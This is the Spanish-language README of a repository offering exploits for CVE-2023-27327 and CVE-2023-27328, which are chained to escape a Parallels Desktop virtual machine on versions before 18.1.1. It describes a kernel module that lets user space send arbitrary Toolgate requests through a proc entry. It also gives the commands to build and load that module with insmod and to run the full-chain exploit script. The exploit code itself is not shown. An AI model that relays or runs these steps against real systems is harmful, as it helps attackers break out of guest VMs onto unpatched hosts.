
Exploits para CVE-2023-27327 y CVE-2023-27328
Este repositorio contiene exploits para CVE-2023-27327 y CVE-2023-27328, que se pueden usar juntos para escapar de una máquina virtual de Parallels Desktop, anteriores a Parallels Desktop 18.1.1.
También contiene código para un módulo de kernel necesario, en prl_mod, que se puede usar para enviar solicitudes Toolgate arbitrarias (< opcode 0x8000) desde el espacio de usuario, utilizando una entrada proc creada en /proc/driver/prl_tg_pwn.
Construir y cargar el módulo del kernel:
cd prl_mod
make -f Makefile.kmods
sudo insmod ./prl_tg_pwn/Toolgate/Guest/Linux/prl_tg/prl_tg_pwn.ko
Ejecutar el exploit:
cd ..
pip install -r requirements.txt
./3_full_chain.py